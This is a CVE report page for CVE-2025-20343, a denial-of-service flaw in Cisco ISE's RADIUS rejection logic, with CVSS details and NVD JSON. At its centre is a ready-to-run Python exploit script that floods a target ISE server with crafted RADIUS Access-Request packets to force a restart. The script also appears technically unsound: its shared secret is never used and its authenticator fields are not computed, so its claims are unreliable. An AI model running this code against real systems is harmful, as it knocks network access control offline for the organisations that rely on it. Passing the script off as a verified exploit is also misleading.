Security Vulnerability Report
CVE-2025-20343 CVSS 8.6 HIGH

CVE-2025-20343

Published: 2025-11-05 17:15:37
Last Modified: 2025-11-19 14:56:35

Description

A vulnerability in the RADIUS setting "Reject RADIUS requests from clients with repeated failures" on Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to cause Cisco ISE to restart unexpectedly.

This vulnerability is due to a logic error when processing a RADIUS access request for a MAC address that is already a rejected endpoint. An attacker could exploit this vulnerability by sending a specific sequence of multiple crafted RADIUS access request messages to Cisco ISE. A successful exploit could allow the attacker to cause a denial of service (DoS) condition when Cisco ISE restarts.

CVSS Details

CVSS Score: 8.6
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:cisco:identity_services_engine:3.4.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:cisco:identity_services_engine:3.4.0:patch1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:cisco:identity_services_engine:3.4.0:patch2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:cisco:identity_services_engine:3.4.0:patch3:*:*:*:*:*:* - VULNERABLE
Cisco Identity Services Engine (ISE): affected versions should be confirmed against Cisco's official security advisory.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-20343 PoC - Cisco ISE RADIUS DoS Exploit

This PoC demonstrates sending crafted RADIUS access requests to trigger
the denial of service condition in Cisco ISE.

WARNING: This code is for educational and authorized security testing only.
"""

import socket
import struct
import random
import time


def build_radius_packet(username, mac_address, request_id=1):
    """Build a RADIUS Access-Request packet"""
    # RADIUS packet header: Code(1) + ID(1) + Length(2) + Authenticator(16)
    code = 1  # Access-Request
    authenticator = bytes(random.getrandbits(8) for _ in range(16))

    # Build attributes
    attributes = b''

    # User-Name attribute (Type 1)
    username_bytes = username.encode()
    attributes += bytes([1, len(username_bytes) + 2]) + username_bytes

    # User-Password attribute (Type 2)
    password = b'password'
    password_padded = password.ljust(16, b'\x00')[:16]
    attributes += bytes([2, len(password_padded) + 2]) + password_padded

    # Calling-Station-Id attribute (Type 31) - MAC address
    mac_bytes = mac_address.encode()
    attributes += bytes([31, len(mac_bytes) + 2]) + mac_bytes

    # NAS-IP-Address attribute (Type 4)
    nas_ip = bytes([10, 0, 0, 1])
    attributes += bytes([4, 6]) + nas_ip

    # NAS-Identifier attribute (Type 32)
    nas_id = b'CiscoISE'
    attributes += bytes([32, len(nas_id) + 2]) + nas_id

    # Message-Authenticator attribute (Type 80)
    msg_auth = bytes([80, 18]) + bytes(16)
    attributes += msg_auth

    # Calculate total length
    total_length = 20 + len(attributes)

    # Build packet
    packet = bytes([code, request_id]) + struct.pack('!H', total_length) + authenticator + attributes
    return packet


def exploit_cisco_ise(target_ip, target_port=1812, mac_address='00:11:22:33:44:55'):
    """
    Send crafted RADIUS requests to trigger CVE-2025-20343

    Args:
        target_ip: Cisco ISE server IP
        target_port: RADIUS port (default 1812)
        mac_address: Target MAC address to use in requests
    """
    print(f"[*] Starting CVE-2025-20343 exploit against {target_ip}")
    print(f"[*] Target MAC: {mac_address}")

    # Shared secret for RADIUS (default or known secret)
    shared_secret = b'Secret'

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(5)

        # First, send a request to establish the endpoint as rejected
        print("[*] Step 1: Sending initial RADIUS request...")
        packet1 = build_radius_packet('test_user', mac_address, request_id=1)
        sock.sendto(packet1, (target_ip, target_port))

        # Wait a moment
        time.sleep(0.5)

        # Send multiple crafted requests to trigger the vulnerability
        print("[*] Step 2: Sending crafted RADIUS request sequence...")
        for i in range(10):
            packet = build_radius_packet('test_user', mac_address, request_id=i+2)
            sock.sendto(packet, (target_ip, target_port))
            time.sleep(0.2)
            print(f"[*] Sent packet {i+1}/10")

        print("[+] Exploit sent. If vulnerable, Cisco ISE should restart.")

    except socket.error as e:
        print(f"[-] Socket error: {e}")
    finally:
        sock.close()


if __name__ == '__main__':
    import argparse

    parser = argparse.ArgumentParser(description='CVE-2025-20343 PoC')
    parser.add_argument('target', help='Target Cisco ISE IP address')
    parser.add_argument('--port', type=int, default=1812, help='RADIUS port')
    parser.add_argument('--mac', default='00:11:22:33:44:55', help='Target MAC address')
    args = parser.parse_args()

    exploit_cisco_ise(args.target, args.port, args.mac)
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20343", "sourceIdentifier": "[email protected]", "published": "2025-11-05T17:15:37.443", "lastModified": "2025-11-19T14:56:35.483", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the RADIUS setting Reject RADIUS requests from clients with repeated failures on Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to cause Cisco ISE to restart unexpectedly.\r\n\r\nThis vulnerability is due to a logic error when processing a RADIUS access request for a MAC address that is already a rejected endpoint. An attacker could exploit this vulnerability by sending a specific sequence of multiple crafted RADIUS access request messages to Cisco ISE. A successful exploit could allow the attacker to cause a denial of service (DoS) condition when Cisco ISE restarts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-697"}]}], "configurations": [{"nodes": [{"operator": 
"OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.4.0:-:*:*:*:*:*:*", "matchCriteriaId": "D23905E0-E525-49B1-8E5F-4EB42D186768"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.4.0:patch1:*:*:*:*:*:*", "matchCriteriaId": "74509498-38EF-4345-9583-CEF5C26CA1D8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.4.0:patch2:*:*:*:*:*:*", "matchCriteriaId": "CD05FF93-7B8C-4283-9DB7-E03FE98FAADF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cisco:identity_services_engine:3.4.0:patch3:*:*:*:*:*:*", "matchCriteriaId": "0F9B6A8E-E773-44A3-9266-878F0C58EB41"}]}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-radsupress-dos-8YF3JThh", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}